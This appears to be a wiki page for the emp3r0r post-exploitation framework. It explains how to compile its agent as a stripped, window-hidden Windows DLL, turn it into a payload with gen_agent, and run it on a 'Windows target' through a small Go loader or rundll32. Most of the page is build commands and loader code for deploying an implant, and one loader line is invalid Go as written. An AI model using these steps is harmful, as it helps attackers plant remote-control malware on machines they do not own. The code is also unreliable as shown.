-
-
Notifications
You must be signed in to change notification settings - Fork 232
DLL Agent
Jing Mi edited this page Jan 30, 2024
·
3 revisions
Modify ./cmd/agent/main.go to make it include this:
// everything else
import "C"
//export main
func main() {
// everything else
}This should export function main to make it callable.
You will need at least mingw and Go environment installed on your Windows machine to build the DLL.
Build the agent DLL on Windows host, with the following command:
go build -buildmode=c-shared -ldflags='-s -w -H=windowsgui' -o emp3r0r.dll .\cmd\agent\
Copy emp3r0r.dll to ~/.emp3r0r/stub-win-dll-amd64, then open emp3r0r.
Run gen_agent and select option 3.
Copy the generated DLL and use it on your Windows target.
Here's a small tool that invokes a certain function from a certain DLL:
package main
import (
"flag"
"fmt"
"syscall"
)
func main() {
dll_file := flag.String("dll", "", "Load this DLL file")
func_name := flag.String("func", "", "Call this function")
flag.Parse()
dllPath := *dll_file
procName := *func_name
// Load the DLL
dll, err := syscall.LoadLibrary(dllPath)
if err != nil {
fmt.Println("Error loading DLL:", err)
return
}
defer syscall.FreeLibrary(dll)
// Get the function address
proc, err := syscall.GetProcAddress(dll, procName)
if err != nil {
fmt.Println("Error getting function address:", err)
return
}
// Call the function
_, _, _ := syscall.SyscallN(proc, 0, 0, 0, 0)
}Build and run it:
$env:VERBOSE='true' # enable logging so you know the agent is running
.\rundll.exe -func main -dll emp3r0r.dllYou can also invoke the DLL using rundll32.exe emp3r0r.dll main, but you probably won't see any output even if VERBOSE is set to true.